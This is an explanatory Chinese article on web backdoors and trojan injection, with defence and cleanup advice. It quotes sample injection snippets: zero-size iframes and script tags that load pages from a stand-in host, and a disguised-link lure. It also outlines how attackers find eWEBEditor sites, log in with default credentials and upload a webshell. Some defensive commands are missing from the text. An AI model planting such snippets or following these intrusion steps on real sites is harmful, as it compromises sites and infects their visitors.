基本介紹
網頁後門和網頁掛馬,網頁後門,網頁掛馬,網頁掛馬的類型,框架嵌入式網路掛馬,js調用型網頁掛馬,圖片偽裝掛馬,網路釣魚掛馬(也稱為偽裝調用掛馬),偽裝掛馬,總結,網頁漏洞的尋找方法,網頁的漏洞威脅,網站入侵分析,判斷分析網頁漏洞,網頁木馬的防禦和清除,防禦網頁木馬,清理網頁掛馬,解決eWEBEditor編輯器安全隱患,
網頁後門和網頁掛馬
網頁後門
網頁後門其實就是一段網頁代碼,主要以ASP和PHP代碼為主。由於這些代碼都運行在伺服器端,攻擊者通過這段精心設計的代碼,在伺服器端進行某些危險的操作,獲得某些敏感的技術信息或者通過滲透,提權獲得伺服器的控制權。並且這也是攻擊者控制伺服器的一條通道,比一般的入侵更具有隱蔽性。
網頁掛馬
網頁掛馬的類型
框架嵌入式網路掛馬
網頁木馬被攻擊者利用iframe語句,載入到任意網頁中都可執行的掛馬形式,是最早也是最有效的的一種網路掛馬技術。通常的掛馬代碼如下:
以下是引用片段: <iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe> |
解釋:在打開插入該句代碼的網頁後,就也就打開了http://www.xxx.com/muma.html頁面,但是由於它的長和寬都為“0”,所以很難察覺,非常具有隱蔽性。下面我們做過做個演示,比如在某網頁中插入如下代碼:
以下是引用片段: <iframe src=http://safe.it168.com width=200 height=200></iframe> |
js調用型網頁掛馬
以下是引用片段: <script language=javascript src=http://www.xxx.com/gm.js></script> |
圖片偽裝掛馬
隨著防毒技術的發展,黑手段也不停地更新,圖片木馬技術逃避防毒監視的新技術,攻擊者將類似: /Article/UploadFiles/200804/20080402113208921.gif圖片檔案中,這些嵌入代碼的圖片都可以用工具生成,攻擊者只需輸入相關的選項就可以了,如圖3。圖片木馬生成後,再利用代碼調用執行,是比較新穎的一種掛馬隱蔽方法,實例代碼如:
以下是引用片段: <html> <iframe src="http://www.xxx.com/test.htm" height=0 width=0> </iframe> <img src="/Article/UploadFiles/200804/20080402113212263.jpg"></center> </html> |
網路釣魚掛馬(也稱為偽裝調用掛馬)
網路中最常見的欺騙手段,黑客們利用人們的獵奇、貪心等心理偽裝構造一個連結或者一個網頁,利用社會工程學欺騙方法,引誘點擊,當用戶打開一個看似正常的頁面時,網頁代碼隨之運行,隱蔽性極高。這種方式往往和欺騙用戶輸入某些個人隱私信息,然後竊取個人隱私相關聯。比如攻擊者模仿騰訊公司設計了一個獲取QQ幣的頁面,引誘輸入QQ號和密碼
偽裝掛馬
以下是引用片段: <p><a id="qipian" href="http://www.hacker.com.cn"></a></p> <div> <a href="http://safe.it168.com" target="_blank"> <table> <caption> <label for="qipian"> <u style="cursor;pointer;color;blue"> </u> </label> </caption> </table> </a> </div> |
總結
網頁漏洞的尋找方法
網頁的漏洞威脅
網頁的漏洞主要有注入漏洞、跨站漏洞、旁註漏洞、上傳漏洞、暴庫漏洞和程式漏洞等等。針對這么多的漏洞威脅,網站管理員要對自己的網站進行安全檢測,然後進行安全設定或者代碼改寫。那如何來檢測網站存在的漏洞呢?其實,很多攻擊者都是通過一些黑客工具來檢測網站的漏洞然後實施攻擊的。那么網站的管理員就可以利用這些工具對網站進行安全檢測,看有沒有上述漏洞,筆者就不一一演示了。下面就列舉一個當前比較流行的eWEBEditor線上HTML編輯器上傳漏洞做個演示和分析。
網站入侵分析
eWEBEditor是一個線上的HTML編輯器,很多網站都集成這個編輯器,以方便發布信息。低版本的eWEBEditor線上HTML編輯器,存在者上傳漏洞,黑客利用這點得到WEBSHELL(網頁管理許可權)後,修改了網站,進行了掛馬操作。
其原理是:eWEBEditor的默認管理員登錄頁面沒有更改,而且默認的用戶名和密碼都沒有更改。攻擊者登入eWEBEditor後,添加一種新的樣式類型,然後設定上傳檔案的類型,比如加入asp檔案類型,就可以上傳一個網頁木馬了。
判斷分析網頁漏洞
(1)攻擊者判斷網站是否採用了eWEBEditor的方法一般都是通過瀏覽網站查看相關的頁面或者通過搜尋引擎搜尋類似"ewebeditor.asp?id="語句,只要類似的語句存在,就能判斷網站確實使用了WEB編輯器。
(2)eWEBEditor編輯器可能被黑客利用的安全漏洞:
b.管理員未對編輯器的後台管理路徑進行修改導致黑客可以通過資料庫獲得的用戶名和密碼進行登入或者直接輸入默認的用戶名和密碼,直接進入編輯器的後台。
c.該WEB編輯器上傳程式存在安全漏洞。
網頁木馬的防禦和清除
防禦網頁木馬
(1)卸載wscript.shell對象,在cmd先或者直接運行:
(2)卸載FSO對象,在cmd下或者直接運行:
regsvr32.exe /u %windir%\system32\scrrun.dll
(3)卸載stream對象,在cmd下或者直接運行:
regsvr32.exe /u /s "C:\Program Files\Common Files\System\ado\msado15.dll"
註:如果想恢復的話只需重新註冊即可,例如:
清理網頁掛馬
(1)利用雷客圖ASP站長安全助手查找所有在2008-3.1日-2008.3.5日之間所有修改過的檔案里是否有iframe語句和http://www.xxx.com/a.htm關鍵字,進行手工清理。
(2)也可利用雷客圖ASP站長安全助手批量刪除網馬。
(3)檢測JS檔案,在2008-3.1日-2008.3.5日之間增加的JS檔案全部刪除
解決eWEBEditor編輯器安全隱患
由於網站在開發時集成了eWEBEditor編輯器,刪除或者替換容易導致其他問題的出現,推薦按如下方案解決:
(1)修改該編輯器的默認資料庫路徑和資料庫名,防止被黑客非法下載。
默認登錄路徑admin_login.asp 默認資料庫db/ewebeditor.mdb
(2)修改編輯器後台登錄路徑和默認的登錄用戶名和密碼,防止黑客進入管理界面。
